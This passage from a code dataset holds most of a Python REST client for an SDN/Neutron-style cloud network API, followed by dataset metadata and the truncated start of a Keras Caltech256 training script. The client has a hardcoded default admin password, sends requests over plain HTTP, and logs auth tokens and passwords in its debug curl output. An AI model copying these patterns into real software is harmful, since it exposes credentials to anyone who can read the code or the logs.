self.res.body)\n if code != 200:\n print(result)\n return\n self.log(result)\n\n def get(self):\n code, result = self.api.req('get', self.url, self.res.body)\n if code != 200:\n print(result)\n return\n 
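# Successful responses are rendered by log(): a raw JSON dump when\n        # output_format is 'json', otherwise an ASCII table via Table.from_json().\n        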
self.log(result)\n\n def delete(self):\n code, result = self.api.req('delete', self.url, self.res.body)\n if code != 200:\n print(result)\n\n# Rest API tools for all kinds of resources\nclass RestAPI():\n def __init__(self, auth_host, auth_port='35357', host=None, port=None, version='v2', user='ArcherAdmin',\n password='ArcherAdmin@123', project='ArcherAdmin', domain='Default'):\n self.auth_host = auth_host\n self.auth_port = auth_port\n self.version = version\n self.user = user\n self.password = password\n self.project = project\n self.domain = domain\n self.headers = {'Content-Type': 'application/json'}\n self.token = ''\n self.host = host\n self.port = port\n\n def add_header(self, header):\n self.headers.update(header)\n\n def get_token(self):\n if self.version == 'v3':\n auth_url = 'http://%s:%s/v3/auth/tokens' % (self.auth_host, self.auth_port)\n body = { 'auth': {\n 'identity': {\n 'methods': [\"password\"],\n 'password': {\n 'user': {\n 'name': self.user,\n 'password': self.password,\n 'domain': {\n 'name': \"Default\"\n }\n }\n }\n },\n 'scope': {\n 'project': {\n 'domain': {\n 'name': \"Default\"\n },\n 'name': self.project\n }\n }\n }\n }\n else:\n auth_url = 'http://%s:%s/v2.0/tokens' % (self.auth_host, self.auth_port)\n body = {\n 'auth': {\n 'tenantName':self.project,\n 'passwordCredentials': {\n 'username': self.user,\n 'password': self.password\n }\n }\n }\n header = {'Content-Type': 'application/json'}\n header_str = '-H \"Content-Type:application/json\" '\n DEBUG(\"curl -X POST %s %s-d '%s'\" % (auth_url, header_str, json.dumps(body)))\n try:\n res = requests.post(auth_url, data=json.dumps(body), headers=header)\n except Exception as e:\n print(str(e))\n return None\n if res.status_code == 401:\n return None\n if (self.version == 'v2'):\n token = json.loads(res.text)\n self.token = token['access']['token']['id']\n else:\n self.token = res.headers['x-subject-token']\n self.headers['X-Auth-Token'] = self.token\n return self.token\n\n def req(self, method, url, body=None):\n oper = {\n 'get': requests.get,\n 'post': requests.post,\n 'put': requests.put,\n 'delete': requests.delete\n }\n if not self.token:\n self.get_token()\n self.headers['X-Auth-Token'] = self.token\n data = json.dumps(body) if body else None\n\n header_str = ''\n for (key,value) in self.headers.items():\n header_str += '-H \"%s:%s\" ' % (key, value)\n\n if method not in oper.keys():\n print ('Error: not supported rest method (%s)' % method)\n return None\n\n if method == 'get':\n DEBUG('\\ncurl -X GET \"%s\" %s | python -m json.tool\\n' % (url, header_str))\n else:\n DEBUG(\"\\ncurl -X %s %s %s-d '%s' | python -m json.tool\\n\" % (method.upper(), url, header_str, data))\n\n tm = time.time()\n try:\n res = oper[method](url, data=data, headers=self.headers)\n except Exception as e:\n return 500, str(e)\n print(res.status_code, 'length:', len(res.content), 'time:', time.time()-tm)\n if res.text:\n try:\n if not disable_out:\n DEBUG(json.dumps(res.json()))\n return res.status_code, res.json()\n except:\n if not disable_out:\n DEBUG(res.text)\n return res.status_code, res.text\n else:\n return res.status_code, []\n\n def encode_url(self, uri, host=None, port=None, api_version=None):\n if not host:\n host = self.host\n else:\n self.host = host\n if not port:\n port = self.port\n else:\n self.port = port\n if (api_version is None):\n return 'http://%s:%s%s' % (host, port, uri)\n else:\n return 'http://%s:%s/%s%s' % (host, port, api_version, uri)\n\nclass Table():\n def __init__(self, indent=0):\n self.column = 
[]\n self.raw = []\n self.pretty = []\n self.indent = indent\n self.table = ''\n def add_column(self, column):\n col = [ str(i) for i in column ]\n self.column.append(col)\n def from_json(self, json):\n if isinstance(json, list):\n # multi table\n for item in json:\n self.column = []\n self.add_column(list(item.keys()))\n self.add_column(list(item.values()))\n self._form_table()\n else:\n # single table\n self.add_column(list(json.keys()))\n self.add_column(list(json.values()))\n self._form_table()\n def _form_table(self):\n self.pretty = []\n col = len(self.column)\n raw = len(max(self.column, key=len))\n total = 0\n head = '+'\n for i in range(raw):\n pretty = '|'\n for j in range(col):\n max_item = max(self.column[j], key=len)\n pretty = '{0}{1}{2:<{len}}|'.format(pretty, ' '*self.indent, self.column[j][i],\n len=len(max_item) + self.indent)\n if len(head) != total:\n head = \"{0}{1}+\".format(head, '-'*(len(max_item)+self.indent*2))\n total = len(pretty)\n self.pretty.append(pretty)\n self.table = '\\n'.join([self.table, head, '\\n'.join(self.pretty), head])\n def __str__(self):\n return self.table\n\n# read json have '#' as comment and strip comment\ndef read_comment_json(file):\n text = ''\n with open(file, 'r') as f:\n all_lines = f.readlines()\n comment = re.compile('\\s*//')\n for line in all_lines:\n if not re.match(comment, line):\n text += line\n return text\n\ndef auth_from_file():\n auth_config = None\n path = os.path.dirname(os.path.abspath(__file__))\n auth_file = path + '/auth.json'\n if os.path.exists(auth_file):\n auth_text = read_comment_json(auth_file)\n auth_config = json.loads(auth_text)\n return auth_config\n\ndef pasrse_config_file(config_file=None):\n auth = {}\n config = None\n auth_config = auth_from_file()\n if config_file:\n text = read_comment_json(config_file)\n config = json.loads(text)\n if not auth_config:\n auth_config = config\n if auth_config:\n auth['auth_host'] = auth_config['auth_host']\n auth['host'] = auth_config['host'] if 'host' in auth_config else auth['auth_host']\n auth['user'] = auth_config['user'] if 'user' in auth_config else 'admin'\n auth['password'] = auth_config['password'] if 'password' in auth_config else None\n auth['project'] = auth_config['project'] if 'project' in auth_config else 'admin'\n auth['version'] = auth_config['version'] if 'version' in auth_config else 'v2'\n auth['auth_port'] = auth_config['auth_port'] if 'auth_port' in auth_config else '5000'\n port = 8082\n method = 'get'\n api = '/'\n body = {}\n if config:\n if 'auth_host' in config:\n auth['auth_host'] = config['auth_host']\n if 'auth_port' in config:\n auth['auth_port'] = config['auth_port']\n if 'user' in config:\n auth['user'] = config['user']\n if 'password' in config:\n auth['password'] = config['password']\n if 'project' in config:\n auth['project'] = config['project']\n if 'version' in config:\n auth['version'] = config['version']\n if 'host' in config:\n auth['host'] = config['host']\n if 'port' in config:\n port = config['port']\n if 'method' in config:\n method = config['method']\n if 'api' in config:\n api = config['api']\n if 'body' in config:\n body = config['body']\n if 'header' in config:\n auth['header'] = {}\n headers = config['header'].split(';')\n for header in headers:\n head = header.split(':')\n if len(head) > 1:\n auth['header'][head[0]] = head[1]\n auth['port'] = port\n auth['method'] = method\n auth['api'] = api\n auth['body'] = body\n return auth\n\nclass ResBase():\n def __init__(self):\n self.url = None\n self.body = {}\n\nclass 
Resource():\n def __init__(self, res_type, res_id=None, name=None):\n self._type = res_type\n self._id = res_id\n self._name = name\n self.url = '/neutron/' + self._type\n self.resource = { 'tenant_id': 'ad88dd5d24ce4e2189a6ae7491c33e9d' }\n if self._id:\n self.resource['id'] = self._id\n if self._name:\n self.resource['name'] = self._name\n self.data = {\n 'fields': [],\n 'resource': self.resource,\n 'id': self.id,\n 'filters': {}\n }\n self.context = {\n 'user_id': '44faef681cd34e1c80b8520dd6aebad4',\n 'tenant_id': 'ad88dd5d24ce4e2189a6ae7491c33e9d',\n 'is_admin': True,\n 'request_id': 'req-' + str(uuid.uuid1()),\n 'operation': 'READALL',\n 'type': self._type\n }\n\n @property\n def type(self):\n return self._type\n\n @property\n def name(self):\n return self._name\n @name.setter\n def name(self, value):\n self._name = value\n self.resource['name'] = value\n\n @property\n def id(self):\n return self._id\n @id.setter\n def id(self, value):\n self._id = value\n self.data['id'] = value\n self.resource['id'] = value\n\n @property\n def filters(self):\n return self.data.get('filters')\n @filters.setter\n def filters(self, value):\n self.data['filters'] = value\n\n @property\n def fields(self):\n return self.data.get('fields')\n @fields.setter\n def fields(self, value):\n self.data['fields'] = value\n\n @property\n def shared(self):\n return self.resource.get('shared')\n @shared.setter\n def shared(self, value):\n self.resource['shared'] = value\n\n @property\n def enabled(self):\n return self.resource.get('admin_state_up')\n @enabled.setter\n def enabled(self, value):\n self.resource['admin_state_up'] = value\n\n @property\n def oper(self):\n return self.context.get('operation')\n @oper.setter\n def oper(self, oper):\n self.context['operation'] = oper\n\n @property\n def body(self):\n self._body = {'data': self.data, 'context': self.context}\n return self._body\n\nclass VirtualNetwork(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('network', res_id=res_id, name=name)\n\n @property\n def external(self):\n return self.resource.get('router:external')\n @external.setter\n def external(self, value):\n self.resource['router:external'] = value\n if self.resource['router:external']:\n self.resource['provider:network_type'] = 'vlan'\n else:\n self.resource['provider:network_type'] = 'vxlan'\n\n @property\n def segment(self):\n return self.resource.get('provider:segmentation_id')\n @segment.setter\n def segment(self, value):\n self.resource['provider:segmentation_id'] = value\n\nclass Subnet(Resource):\n def __init__(self, network=None, res_id=None, name=None):\n super().__init__('subnet', res_id=res_id, name=name)\n self.resource['network_id'] = network\n\n @property\n def net(self):\n return self.resource.get('network_id')\n @net.setter\n def net(self, value):\n self.resource['network_id'] = value\n @property\n def cidr(self):\n return self.resource.get('cidr')\n @cidr.setter\n def cidr(self, value):\n self.resource['cidr'] = value\n @property\n def dhcp(self):\n return self.resource.get('enable_dhcp')\n @dhcp.setter\n def dhcp(self, value):\n self.resource['enable_dhcp'] = value\n @property\n def gateway(self):\n return self.resource.get('gateway_ip')\n @gateway.setter\n def gateway(self, value):\n self.resource['gateway_ip'] = value\n def add_alloc_pool(self, start, end):\n pool = self.resource.get('allocation_pools')\n if pool:\n pool.append({'start': start, 'end': end})\n else:\n pool = [{'start': start, 'end': end}]\n self.resource['allocation_pools'] = pool\n\nclass 
Port(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('port', res_id=res_id, name=name)\n\n    @property\n    def net(self):\n        return self.resource.get('network_id')\n    @net.setter\n    def net(self, value):\n        self.resource['network_id'] = value\n    @property\n    def subnet(self):\n        # fixed_ips is a list of dicts; this CLI only manages the first entry.\n        fixed_ips = self.resource.get('fixed_ips')\n        if fixed_ips:\n            return fixed_ips[0].get('subnet_id')\n    @subnet.setter\n    def subnet(self, value):\n        if 'fixed_ips' in self.resource:\n            self.resource['fixed_ips'][0]['subnet_id'] = value\n        else:\n            self.resource['fixed_ips'] = [{'subnet_id': value}]\n    @property\n    def ip(self):\n        fixed_ips = self.resource.get('fixed_ips')\n        if fixed_ips:\n            return fixed_ips[0].get('ip_address')\n    @ip.setter\n    def ip(self, value):\n        if 'fixed_ips' in self.resource:\n            self.resource['fixed_ips'][0]['ip_address'] = value\n        else:\n            self.resource['fixed_ips'] = [{'ip_address': value}]\n    @property\n    def security_groups(self):\n        return self.resource.get('security_groups')\n    @security_groups.setter\n    def security_groups(self, value):\n        self.resource['security_groups'] = value\n    @property\n    def qos(self):\n        return self.resource.get('qos')\n    @qos.setter\n    def qos(self, value):\n        self.resource['qos'] = value\n\nclass Router(Resource):\n    class PortForwording():\n        def __init__(self, protocol, vm_ip, vm_port, public_port, status='enable'):\n            self.status = status.upper()\n            self.vm_ip = vm_ip\n            self.vm_port = vm_port\n            self.protocol = protocol\n            self.public_port = public_port\n\n    def __init__(self, res_id=None, name=None):\n        super().__init__('router', res_id=res_id, name=name)\n        self._external = None\n\n    @property\n    def net(self):\n        if self._external:\n            return self.resource['external_gateway_info'].get('network_id')\n    @net.setter\n    def net(self, value):\n        if self._external:\n            self.resource['external_gateway_info']['network_id'] = value\n        else:\n            self.resource['external_gateway_info'] = {'network_id': value}\n            self._external = self.resource['external_gateway_info']\n    @property\n    def fixed_ip(self):\n        return self.resource.get('external_fixed_ips')\n    @fixed_ip.setter\n    def fixed_ip(self, value):\n        if self._external:\n            self.resource['external_gateway_info']['external_fixed_ips'] = value\n        else:\n            # Mirror the net setter: create the gateway dict once and remember it.\n            self.resource['external_gateway_info'] = {\n                'external_fixed_ips': value\n            }\n            self._external = self.resource['external_gateway_info']\n    @property\n    def gateway(self):\n        return self.resource.get('external_gateway_info')\n    @gateway.setter\n    def gateway(self, value):\n        self.resource['external_gateway_info'] = value\n    @property\n    def subnet(self):\n        return self.resource.get('subnet_id')\n    @subnet.setter\n    def subnet(self, value):\n        self.resource['subnet_id'] = value\n    @property\n    def portforward(self):\n        return self.resource.get('portforwardings')\n    @portforward.setter\n    def portforward(self, value):\n        if not value:\n            self.resource['portforwardings'] = None\n            return\n        portforwarding = value.__dict__\n        if self.resource.get('portforwardings'):\n            self.resource['portforwardings'].append(portforwarding)\n        else:\n            self.resource['portforwardings'] = [portforwarding]\n\nclass LoadBalancer(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('loadbalancer', res_id=res_id, name=name)\n    @property\n    def subnet(self):\n        return self.resource.get('vip_subnet_id')\n    @subnet.setter\n    def subnet(self, value):\n        self.resource['vip_subnet_id'] = value\n    @property\n    def vip(self):\n        return self.resource.get('vip_address')\n    @vip.setter\n    def vip(self, value):\n        self.resource['vip_address'] = value\n    @property\n    def provider(self):\n        return self.resource.get('provider')\n    
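# Backend driver of the LB; the CLI restricts this to 'arsdn' or 'octavia'\n    # (see parser_loadbalancer's -p/--provider choices).\n    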
@provider.setter\n    def provider(self, value):\n        self.resource['provider'] = value\n    @property\n    def cluster(self):\n        return self.resource.get('cluster')\n    @cluster.setter\n    def cluster(self, value):\n        self.resource['cluster'] = value\n    @property\n    def listeners(self):\n        return self.resource.get('listeners')\n    @listeners.setter\n    def listeners(self, value):\n        self.resource['listeners'] = value\n    @property\n    def pools(self):\n        return self.resource.get('pools')\n    @pools.setter\n    def pools(self, value):\n        self.resource['pools'] = value\n\nclass LoadBalanceListener(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('listener', res_id=res_id, name=name)\n    @property\n    def lb(self):\n        return self.resource.get('loadbalancer_id')\n    @lb.setter\n    def lb(self, value):\n        self.resource['loadbalancer_id'] = value\n    @property\n    def protocol(self):\n        return self.resource.get('protocol')\n    @protocol.setter\n    def protocol(self, value):\n        self.resource['protocol'] = value\n    @property\n    def port(self):\n        return self.resource.get('protocol_port')\n    @port.setter\n    def port(self, value):\n        self.resource['protocol_port'] = int(value)\n\nclass LoadBalancePool(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('pool', res_id=res_id, name=name)\n    @property\n    def lb(self):\n        return self.resource.get('loadbalancer_id')\n    @lb.setter\n    def lb(self, value):\n        self.resource['loadbalancer_id'] = value\n    @property\n    def listener(self):\n        return self.resource.get('listener_id')\n    @listener.setter\n    def listener(self, value):\n        self.resource['listener_id'] = value\n    @property\n    def protocol(self):\n        return self.resource.get('protocol')\n    @protocol.setter\n    def protocol(self, value):\n        self.resource['protocol'] = value\n    @property\n    def algorithm(self):\n        return self.resource.get('lb_algorithm')\n    @algorithm.setter\n    def algorithm(self, value):\n        self.resource['lb_algorithm'] = value\n\nclass LoadBalanceMember(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('member', res_id=res_id, name=name)\n    @property\n    def pool(self):\n        return self.resource.get('pool_id')\n    @pool.setter\n    def pool(self, value):\n        self.url = self.url.replace('member', f'pool/{value}/member')\n        self.resource['pool_id'] = value\n    @property\n    def subnet(self):\n        return self.resource.get('subnet_id')\n    @subnet.setter\n    def subnet(self, value):\n        self.resource['subnet_id'] = value\n    @property\n    def port(self):\n        return self.resource.get('protocol_port')\n    @port.setter\n    def port(self, value):\n        self.resource['protocol_port'] = int(value)\n    @property\n    def ip(self):\n        return self.resource.get('address')\n    @ip.setter\n    def ip(self, value):\n        self.resource['address'] = value\n\nclass LoadBalanceHealthMonitor(Resource):\n    def __init__(self, pool=None, res_id=None, name=None):\n        super().__init__('healthmonitor', res_id=res_id, name=name)\n        self.pool = pool\n        self.protocol = 'TCP'\n        self.timeout = 10\n        self.delay = 60\n        self.max_retries = 3\n\n    @property\n    def pool(self):\n        return self.resource.get('pool_id')\n    @pool.setter\n    def pool(self, value):\n        self.resource['pool_id'] = value\n    @property\n    def protocol(self):\n        return self.resource.get('type')\n    @protocol.setter\n    def protocol(self, value):\n        self.resource['type'] = value\n    @property\n    def delay(self):\n        return self.resource.get('delay')\n    @delay.setter\n    def delay(self, value):\n        self.resource['delay'] = value\n    @property\n    def timeout(self):\n        return self.resource.get('timeout')\n    @timeout.setter\n    def timeout(self, value):\n        
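# Per-probe timeout; normally kept below 'delay' (defaults here: 10 vs 60).\n        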
self.resource['timeout'] = value\n @property\n def max_retries(self):\n return self.resource.get('max_retries')\n @max_retries.setter\n def max_retries(self, value):\n self.resource['max_retries'] = value\n\nclass Firewall(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('firewall_group', res_id=res_id, name=name)\n @property\n def policys(self):\n return self.resource.get('firewall_policy_ids')\n @policys.setter\n def policys(self, value):\n self.resource['firewall_policy_ids'] = value\n @property\n def projects(self):\n return self.resource.get('projects')\n @projects.setter\n def projects(self, value):\n self.resource['projects'] = value\n @property\n def ports(self):\n return self.resource.get('ports')\n @ports.setter\n def ports(self, value):\n self.resource['ports'] = value\n @property\n def networks(self):\n return self.resource.get('networks')\n @networks.setter\n def networks(self, value):\n self.resource['networks'] = value\n\nclass FwPolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('firewall_policy', res_id=res_id, name=name)\n @property\n def rules(self):\n return self.resource.get('firewall_rules')\n @rules.setter\n def rules(self, value):\n self.resource['firewall_rules'] = value\n @property\n def audited(self):\n return self.resource.get('audited')\n @audited.setter\n def audited(self, value):\n self.resource['audited'] = value\n @property\n def rule(self):\n return self.resource.get('firewall_rule_id')\n @rule.setter\n def rule(self, value):\n self.resource['firewall_rule_id'] = value\n @property\n def insert_before(self):\n return self.resource.get('insert_before')\n @insert_before.setter\n def insert_before(self, value):\n self.resource['insert_before'] = value\n\nclass FwRule(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('firewall_rule', res_id=res_id, name=name)\n @property\n def src_ip(self):\n return self.resource.get('source_ip_address')\n @src_ip.setter\n def src_ip(self, value):\n self.resource['source_ip_address'] = value\n @property\n def dest_ip(self):\n return self.resource.get('destination_ip_address')\n @dest_ip.setter\n def dest_ip(self, value):\n self.resource['destination_ip_address'] = value\n @property\n def src_port(self):\n return self.resource.get('source_port')\n @src_port.setter\n def src_port(self, value):\n self.resource['source_port'] = value\n @property\n def dest_port(self):\n return self.resource.get('destination_port')\n @dest_port.setter\n def dest_port(self, value):\n self.resource['destination_port'] = value\n @property\n def protocol(self):\n return self.resource.get('protocol')\n @protocol.setter\n def protocol(self, value):\n self.resource['protocol'] = value\n @property\n def version(self):\n return self.resource.get('ip_version')\n @version.setter\n def version(self, value):\n self.resource['ip_version'] = value\n @property\n def action(self):\n return self.resource.get('action')\n @action.setter\n def action(self, value):\n self.resource['action'] = value\n @property\n def enabled(self):\n return self.resource.get('enabled')\n @enabled.setter\n def enabled(self, value):\n self.resource['enabled'] = value\n\nclass IkePolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ike_policy', res_id=res_id, name=name)\n @property\n def auth_algorithm(self):\n return self.resource.get('auth_algorithm')\n @auth_algorithm.setter\n def auth_algorithm(self, value):\n self.resource['auth_algorithm'] = value\n @property\n def 
encryption_algorithm(self):\n return self.resource.get('encryption_algorithm')\n @encryption_algorithm.setter\n def encryption_algorithm(self, value):\n self.resource['encryption_algorithm'] = value\n @property\n def ike_version(self):\n return self.resource.get('ike_version')\n @ike_version.setter\n def ike_version(self, value):\n self.resource['ike_version'] = value\n\nclass IpsecPolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipsec_policy', res_id=res_id, name=name)\n @property\n def auth_algorithm(self):\n return self.resource.get('auth_algorithm')\n @auth_algorithm.setter\n def auth_algorithm(self, value):\n self.resource['auth_algorithm'] = value\n @property\n def encryption_algorithm(self):\n return self.resource.get('encryption_algorithm')\n @encryption_algorithm.setter\n def encryption_algorithm(self, value):\n self.resource['encryption_algorithm'] = value\n @property\n def transform_protocol(self):\n return self.resource.get('transform_protocol')\n @transform_protocol.setter\n def transform_protocol(self, value):\n self.resource['transform_protocol'] = value\n\nclass VpnEndpiointGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('vpn_endpoint_group', res_id=res_id, name=name)\n @property\n def endpoints(self):\n return self.resource.get('endpoints')\n @endpoints.setter\n def endpoints(self, value):\n self.resource['endpoints'] = value\n @property\n def endpoint_type(self):\n return self.resource.get('endpoint_type')\n @endpoint_type.setter\n def endpoint_type(self, value):\n self.resource['endpoint_type'] = value\n\nclass VpnService(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('vpn_service', res_id=res_id, name=name)\n @property\n def router(self):\n return self.resource.get('router_id')\n @router.setter\n def router(self, value):\n self.resource['router_id'] = value\n\nclass VpnConnection(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipsec_site_connection', res_id=res_id, name=name)\n @property\n def ike(self):\n return self.resource.get('ike_policy_id')\n @ike.setter\n def ike(self, value):\n self.resource['ike_policy_id'] = value\n @property\n def ipsec(self):\n return self.resource.get('ipsec_policy_id')\n @ipsec.setter\n def ipsec(self, value):\n self.resource['ipsec_policy_id'] = value\n @property\n def service(self):\n return self.resource.get('vpn_service_id')\n @service.setter\n def service(self, value):\n self.resource['vpn_service_id'] = value\n @property\n def peer_ip(self):\n return self.resource.get('peer_address')\n @peer_ip.setter\n def peer_ip(self, value):\n self.resource['peer_address'] = value\n @property\n def peer_id(self):\n return self.resource.get('peer_id')\n @peer_id.setter\n def peer_id(self, value):\n self.resource['peer_id'] = value\n @property\n def psk(self):\n return self.resource.get('psk')\n @psk.setter\n def psk(self, value):\n self.resource['psk'] = value\n @property\n def local_endpoint(self):\n return self.resource.get('local_ep_group_id')\n @local_endpoint.setter\n def local_endpoint(self, value):\n self.resource['local_ep_group_id'] = value\n @property\n def peer_endpoint(self):\n return self.resource.get('peer_ep_group_id')\n @peer_endpoint.setter\n def peer_endpoint(self, value):\n self.resource['peer_ep_group_id'] = value\n\nclass VpnP2SConnection(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipsec_p2s_connection', res_id=res_id, name=name)\n @property\n def auth_mode(self):\n 
return self.resource.get('auth_mode')\n    @auth_mode.setter\n    def auth_mode(self, value):\n        self.resource['auth_mode'] = value\n    @property\n    def cert(self):\n        return self.resource.get('ca_cert')\n    @cert.setter\n    def cert(self, value):\n        self.resource['ca_cert'] = value\n    @property\n    def server_key(self):\n        return self.resource.get('server_key')\n    @server_key.setter\n    def server_key(self, value):\n        self.resource['server_key'] = value\n    @property\n    def server_cert(self):\n        return self.resource.get('server_cert')\n    @server_cert.setter\n    def server_cert(self, value):\n        self.resource['server_cert'] = value\n    @property\n    def service(self):\n        return self.resource.get('vpn_service_id')\n    @service.setter\n    def service(self, value):\n        self.resource['vpn_service_id'] = value\n    @property\n    def exp_cert_list(self):\n        return self.resource.get('crl_list')\n    @exp_cert_list.setter\n    def exp_cert_list(self, value):\n        self.resource['crl_list'] = value\n    @property\n    def local_subnets(self):\n        return self.resource.get('local_subnets')\n    @local_subnets.setter\n    def local_subnets(self, value):\n        self.resource['local_subnets'] = value\n    @property\n    def address_pool(self):\n        return self.resource.get('address_pool')\n    @address_pool.setter\n    def address_pool(self, value):\n        self.resource['address_pool'] = value\n    @property\n    def tcp_mss(self):\n        return self.resource.get('tcp_mss')\n    @tcp_mss.setter\n    def tcp_mss(self, value):\n        self.resource['tcp_mss'] = value\n    @property\n    def dpd(self):\n        return self.resource.get('dpd')\n    @dpd.setter\n    def dpd(self, value):\n        self.resource['dpd'] = value\n\nclass Qos(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('qos', res_id=res_id, name=name)\n    @property\n    def direction(self):\n        return self.resource.get('direction')\n    @direction.setter\n    def direction(self, value):\n        self.resource['direction'] = value\n    @property\n    def rate(self):\n        return self.resource.get('max_rate')\n    @rate.setter\n    def rate(self, value):\n        self.resource['max_rate'] = value\n\nclass IpGroup(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('ipgroup', res_id=res_id, name=name)\n    @property\n    def net(self):\n        return self.resource.get('network_id')\n    @net.setter\n    def net(self, value):\n        self.resource['network_id'] = value\n    @property\n    def ip(self):\n        return self.resource.get('ips')\n    @ip.setter\n    def ip(self, value):\n        self.resource['ips'] = value\n    @property\n    def protocol(self):\n        return self.resource.get('protocol')\n    @protocol.setter\n    def protocol(self, value):\n        self.resource['protocol'] = value\n    @property\n    def port(self):\n        return self.resource.get('ports')\n    @port.setter\n    def port(self, value):\n        self.resource['ports'] = value\n    @property\n    def ratelimit(self):\n        return self.resource.get('qos')\n    @ratelimit.setter\n    def ratelimit(self, value):\n        self.resource['qos'] = value\n\nclass Provider(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('net_provider', res_id=res_id, name=name)\n    @property\n    def interfaces(self):\n        return self.resource.get('interfaces')\n    @interfaces.setter\n    def interfaces(self, value):\n        self.resource['interfaces'] = value\n\nclass FloatingIP(Resource):\n    def __init__(self, res_id=None, name=None):\n        super().__init__('floatingip', res_id=res_id, name=name)\n    @property\n    def net(self):\n        return self.resource.get('floating_network_id')\n    @net.setter\n    def net(self, value):\n        self.resource['floating_network_id'] = value\n    @property\n    def subnet(self):\n        return self.resource.get('subnet_id')\n    
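# Hypothetical usage of the wrapper: point a floating IP at a port, e.g.\n    #   fip = FloatingIP(); fip.net = external_net_id; fip.port = port_id\n    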
@subnet.setter\n def subnet(self, value):\n self.resource['subnet_id'] = value\n @property\n def ip(self):\n return self.resource.get('floating_ip_address')\n @ip.setter\n def ip(self, value):\n self.resource['floating_ip_address'] = value\n @property\n def port(self):\n return self.resource.get('port_id')\n @port.setter\n def port(self, value):\n self.resource['port_id'] = value\n @property\n def fixed_ip(self):\n return self.resource.get('fixed_ip_address')\n @fixed_ip.setter\n def fixed_ip(self, value):\n self.resource['fixed_ip_address'] = value\n\nclass SecurityGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('security_group', res_id=res_id, name=name)\n @property\n def rules(self):\n return self.resource.get('security_group_rules')\n @rules.setter\n def rules(self, value):\n self.resource['security_group_rules'] = value\n\nclass SecurityGroupRule(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('security_group_rule', res_id=res_id, name=name)\n @property\n def group(self):\n return self.resource.get('security_group_id')\n @group.setter\n def group(self, value):\n self.resource['security_group_id'] = value\n\nclass PhysicalRouter(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('physical_router', res_id=res_id, name=name)\n @property\n def mgmt_ip(self):\n return self.resource.get('management_ip')\n @mgmt_ip.setter\n def mgmt_ip(self, value):\n self.resource['management_ip'] = value\n @property\n def snmp(self):\n return self.resource.get('snmp_credentials')\n @snmp.setter\n def snmp(self, value):\n self.resource['snmp_credentials'] = value\n @property\n def router_type(self):\n return self.resource.get('virtual_router_type')\n @router_type.setter\n def router_type(self, value):\n self.resource['virtual_router_type'] = value\n @property\n def connect_check(self):\n return self.resource.get('virtual_router_type')\n @connect_check.setter\n def connect_check(self, value):\n self.resource['virtual_router_type'] = value\n\nclass Tag(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('tag', res_id=res_id, name=name)\n @property\n def type_name(self):\n return self.resource.get('type_name')\n @type_name.setter\n def type_name(self, value):\n self.resource['type_name'] = value\n @property\n def value(self):\n return self.resource.get('value')\n @value.setter\n def value(self, value):\n self.resource['value'] = value\n\nclass ServiceGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('service_group', res_id=res_id, name=name)\n\nclass AddressGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('address_group', res_id=res_id, name=name)\n\nclass SegFirewall(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('segment_firewall_group', res_id=res_id, name=name)\n\nclass SegFirewallPolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('segment_firewall_policy', res_id=res_id, name=name)\n\nclass SegFirewallRule(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('segment_firewall_rule', res_id=res_id, name=name)\n\nclass IpAM(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipam', res_id=res_id, name=name)\n\nclass Node(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('node', res_id=res_id, name=name)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n 
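# exit quietly on Ctrl-C\n        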
pass\n","sub_path":"rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":110459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448347860","text":"# -*- coding: utf-8 -*-\n\n#%% \nimport keras\nimport numpy as np\nfrom keras.applications import imagenet_utils\n#import mxnet as mx\n# %% Loading Caltech 256\ncaltech256_train = '/home/djn/Datasets/caltech256/train'\ncaltech256_test = '/home/djn/Datasets/caltech256/test'\n\ndef caltech_preprocessing(x):\n return imagenet_utils.preprocess_input(x, mode='tf')\n\npicgen = keras.preprocessing.image.ImageDataGenerator(\n horizontal_flip=True,\n fill_mode='nearest',\n width_shift_range=0.2,\n height_shift_range=0.2,\n preprocessing_function=caltech_preprocessing\n)\n\ntrain_gen = picgen.flow_from_directory(caltech256_train,\n target_size=(64, 64),\n batch_size=32\n )\nval_gen = picgen.flow_from_directory(caltech256_test,\n target_size=(64, 64),\n batch_size=32)\n# %% See what we have\n\nnp_rng = np.random.RandomState(1)\npic = train_gen[0][0][0].astype(np.uint8)\n\ninput_shape = pic.shape\nn_classes = len(train_gen.class_indices)\n\n# %%\ndef ConvBNBlock(filters, kernel_size, strides=(1, 1), regularizer=None, padding='same', activation='relu', bn=True):\n\n channel_axis = keras.backend.image_data_format()\n if channel_axis == 'channels_first':\n canary = 1\n else:\n canary = 3\n def convbn(x):\n out = x\n out = keras.layers.Conv2D(filters, kernel_size, strides=strides, padding=padding, kernel_regularizer=regularizer, bias_regularizer=regularizer)(out)\n if bn:\n out = keras.layers.BatchNormalization(axis=canary)(out)\n out = 